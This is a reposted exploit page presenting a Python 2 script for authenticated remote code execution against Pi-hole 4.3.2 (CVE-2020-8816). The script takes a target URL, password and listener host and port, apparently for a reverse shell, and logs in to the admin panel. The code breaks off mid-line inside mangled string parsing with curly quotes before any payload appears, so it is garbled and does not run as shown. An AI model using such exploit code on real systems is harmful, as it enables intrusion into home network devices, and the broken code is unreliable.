Pi-hole 4.3.2 – Remote Code Execution (Authenticated) – Digitalmunition




Exploit/Advisories 1591420242_spider-orange.png

Published on August 6th, 2020 📆 | 7059 Views ⚑

0

Pi-hole 4.3.2 – Remote Code Execution (Authenticated)

#!/usr/bin/env python2

# Exploit Title: Pi-hole 4.3.2 - Remote Code Execution (Authenticated) 
# Date: 2020-08-04
# Exploit Author: Luis Vacas @CyberVaca
# Vendor Homepage: https://pi-hole.net/
# Software Link: https://github.com/pi-hole/pi-hole
# Version: >= 4.3.2
# Tested on: Ubuntu 19.10
# CVE : CVE-2020-8816
# Twitter: https://twitter.com/cybervaca_

import requests
import argparse
import base64

class Color:
    PURPLE = '33[95m'
    CYAN = '33[96m'
    DARKCYAN = '33[36m'
    BLUE = '33[94m'
    GREEN = '33[92m'
    YELLOW = '33[93m'
    RED = '33[91m'
    BOLD = '33[1m'
    UNDERLINE = '33[4m'
    END = '33[0m'

def informa(msg):
    print (Color.GREEN + "[" + Color.RED + "+" + Color.GREEN + "] " +  msg )

def get_args():
    parser = argparse.ArgumentParser(description='CVE-2020-8816 Pi-hole RCE authenticated by @CyberVaca_')
    parser.add_argument('-u', dest='url', type=str, required=True, help="URL Target")
    parser.add_argument('-p', dest='port', type=str, required=True, help="LPORT")
    parser.add_argument('-i', dest='ip', type=str, required=True, help='LHOST')
    parser.add_argument('-pass', dest='password', type=str, required=True, help='Password')
    return parser.parse_args()

banner = base64.b64decode("4pWU4pWQ4pWX4pSsIOKUrOKUjOKUkOKUjCAg4pWU4pWQ4pWX4pSs4pSsIOKUrOKUjOKUgOKUkOKUrCAg4pSM4pSA4pSQCuKVoOKVkOKVneKUguKUguKUguKUguKUguKUgiAg4pWg4pWQ4pWd4pSC4pSc4pSA4pSk4pSCIOKUguKUgiAg4pSc4pSkCuKVqSAg4pSU4pS04pSY4pSY4pSU4pSYICDilakgIOKUtOKUtCDilLTilJTilIDilJjilLTilIDilJjilJTilIDilJgKICAgICAgYnkgQEN5YmVyVmFjYQo=")


def login(url,password):
	session = requests.Session()
	paramsGet = {"login":""}
	paramsPost = {"pw":password}
	headers = {"Origin":url,"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0","Connection":"close","Referer":url + "/admin/index.php?login","Accept-Language":"es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3","Accept-Encoding":"gzip, deflate","Content-Type":"application/x-www-form-urlencoded"}
	cookies = {"PHPSESSID":"cabesha"}
	response = session.post(url + "/admin/index.php", data=paramsPost, params=paramsGet, headers=headers, cookies=cookies, allow_redirects=False)
        token = response.content.split("")[0].split("")[1].split('

‘)[0].split(“


Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...